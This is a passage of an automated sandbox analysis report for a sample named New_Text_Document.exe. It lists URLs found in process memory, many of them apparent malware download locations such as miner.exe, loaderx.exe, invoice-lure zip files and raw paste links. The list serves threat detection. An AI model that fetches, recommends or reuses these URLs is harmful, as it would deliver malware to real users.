                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scproducts.co.za/adis/?87885141
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sealicensing.com/wp-content/uploads/library.bin
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://seniorweekoc.net/ijlog1gmo.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sentirecomex.com/ua/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://servisaludocupacional.pe/public/f1.php
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sfulinzi.gva.co.tz/ero/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sfulinzi.gva.co.tz/ero/?25026141
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sheva.vn/ee/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shg.ph/oei/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shg.ph/oei/?24526141
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shg.ph/oei/?48326141
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shringarseva.in/eiee/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sia.dz/eue/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sia.dz/re/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://silpsicologia.com.br/qt/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://siparisler.github.io/586v/04.07.2022_PAZARTESI_SIPARISLER.XLSX
                    Source: raserver.exe, 00000014.00000002.2492996611.0000000005828000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://sis.hazelwoodschools.org/HZ360x3/login/oqhk?6V=N4ucd4g4l1dZ2qGadA3yayjj5u3ESNt6SQSADc8X19YTl
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://skynnex.com/ru/ru.js
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://slmc.gov.lk/agra/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://slmc.gov.lk/pto/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://slpbridge.com/storage/images/postmon.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://smartphoodapp.com/loaderx.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://smartphoodapp.com/miner.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://smpn41.semarangkota.go.id/Update_new.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://smsfunny.ir/sv/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://snappretail.io/idac/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sofancy.co.za/data/Bin%20(2).exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sofancy.co.za/data/IqXYLXKzl6.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sofancy.co.za/php/alex.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://softwaresbuilders.com/ea/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://solucionesmp.co/iif/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spaceframe.mobi.space-frame.co.za/agha25.tar
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://srg.az/oev/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stayinoceancitymd.com/ow571qp9x.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stonecut.co.uk/niu/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://strongkapten.xyz/sl/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://studyonline.lk/uue/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://suakhoaketsattphcm.com/filial/AgenziaEntrate.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://suakhoaketsattphcm.com/filial/Agenzia_Entrate.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://suakhoaketsattphcm.com/filial/Direzione.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://suakhoaketsattphcm.com/filial/azienda.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://suakhoaketsattphcm.com/filial/cliente.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://suakhoaketsattphcm.com/filial/contratto.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://suakhoaketsattphcm.com/filial/impresa.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://suakhoaketsattphcm.com/filial/marzo.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://subirfact.com/desktopditor.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://switzerlland.com/leav/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://syedahmad.me/llmt/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://syndication.twitter.com:443;
                    Source: svchost.exe, 00000006.00000003.1372813979.0000020CEEA41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                    Source: svchost.exe, 00000006.00000003.1372482361.0000020CEEA49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1372813979.0000020CEEA41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1381330295.0000020CEEA42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1381063993.0000020CEEA36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1373317565.0000020CEEA2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                    Source: svchost.exe, 00000006.00000003.1373317565.0000020CEEA2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                    Source: svchost.exe, 00000006.00000002.1380944116.0000020CEEA2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                    Source: svchost.exe, 00000006.00000003.1372907688.0000020CEEA57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1381581903.0000020CEEA58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tcnboso.com/nai/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://techavela.com/ito/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://techvibeo.com/files2/Flightpath.lnk
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://techvibeo.com/files2/Marketing_plan_Heyhappines_23.lnk
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tecni-soft.com/ACCESORIOS/PLg/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tecno-mobile.co.ke/efpi/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://terrafirmanorth.ca/ti/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://test.earborist.com/connect/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://test.earborist.com/scarica/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://test.typoten.com/rpez546n.rar
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://textbin.net/raw/1lkc5ccspw
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://textbin.net/raw/cgeahsl8f7
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://thomashoneycombfoundation.org/qc/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://threerosesbeauty.com/mise/Cliente.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://threerosesbeauty.com/mise/Contratto.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://threerosesbeauty.com/mise/Funzioni.zip
